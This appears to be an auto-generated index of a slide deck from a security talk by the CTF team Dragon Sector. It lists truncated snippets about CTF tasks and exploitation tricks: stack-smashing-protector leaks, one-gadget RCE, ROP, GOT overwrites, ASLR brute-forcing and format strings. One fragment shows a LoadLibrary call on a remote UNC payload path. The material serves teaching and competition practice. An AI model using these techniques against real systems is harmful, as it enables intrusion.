- Page 1 and 2:
Pwning (sometimes) with style Drago
- Page 3 and 4:
Dragon Sector? Insomni'hack 2014 Ge
- Page 5 and 6:
Agenda
- Page 7 and 8:
The SSP leak • Stack Smashing Pro
- Page 9 and 10:
SSP basics - canary verification
- Page 11 and 12:
__stack_chk_fail *** stack smashing
- Page 13 and 14:
__stack_chk_fail void __attribute__
- Page 15 and 16:
The argv array is at the top of the
- Page 17 and 18:
We can overwrite it, too! $ ./test_
- Page 19 and 20:
Very powerful memory disclosure •
- Page 21:
References 1. Dan Rosenberg, Fun wi
- Page 24 and 25:
Remote KG Task: Given a PCAP file,
- Page 26 and 27:
Remote KG So… what is this protoc
- Page 28 and 29:
Remote KG Next steps: ● write a p
- Page 30:
JS Puzzle Event: Organizers: SECCON
- Page 34 and 35:
One-gadget RCE on Linux • Assumin
- Page 36 and 37:
One-gadget RCE on Linux • An exec
- Page 38 and 39:
One-gadget RCE on Linux If std{out,
- Page 40 and 41:
I/O redirection /bin/sh &N • By d
- Page 42 and 43:
One-gadget RCE on Windows • In GN
- Page 44 and 45:
One-gadget RCE on Windows • There
- Page 46:
LoadLibrary(“\\11.22.33.44\payloa
- Page 49 and 50:
zfs Problem 1: Nothing wants to mou
- Page 52 and 53:
zfs ● xor_key ● key.xor_encrypt
- Page 54 and 55:
zfs ● Gynvael’s way: Brute forc
- Page 56 and 57:
zfs Minimizing input - assume that
- Page 58 and 59:
zfs
- Page 60 and 61:
zfs
- Page 64 and 65: And about system()… • How do we
- Page 66 and 67: Getting remote shell • Otherwise,
- Page 68 and 69: With this, we can… • Leak the a
- Page 70 and 71: libcdb.com
- Page 72 and 73: There’s another way, too • If w
- Page 74: Other teams do it, as well Quote fr
- Page 77 and 78: World Wide Something ^_- TL;DR: .pc
- Page 79 and 80: World Wide Something ^_- Let's recr
- Page 82 and 83: ROP gadgets near libc imports • E
- Page 84 and 85: ROP gadgets near libc imports • 1
- Page 86 and 87: ROP gadgets near libc imports • S
- Page 88 and 89: Partial .got.plt overwrites • If
- Page 90: Brute-forcing ASLR • ASLR on popu
- Page 94 and 95: Format String Fun Typical exploitat
- Page 96 and 97: Even More Format String Fun! Assume
- Page 98 and 99: Even More Format String Fun! printf
- Page 101 and 102: Getting read / recv to fail Imagine
- Page 103 and 104: One-sided connection termination
- Page 105: One-sided connection termination By
- Page 108 and 109: Mumble Mumble high entropy
- Page 110 and 111: Mumble Mumble Approach change: 1. A
- Page 112 and 113: Mumble Mumble
- Page 117 and 118: Patching vs instrumentation ● ●
- Page 119 and 120: 0x90 Event: SIGINT CTF 2013 Organiz
- Page 121 and 122: 0x90 • We decided to run the bina
- Page 123 and 124: It worked! Bochs log console
- Page 125 and 126: Conclusions • CTFs are really fun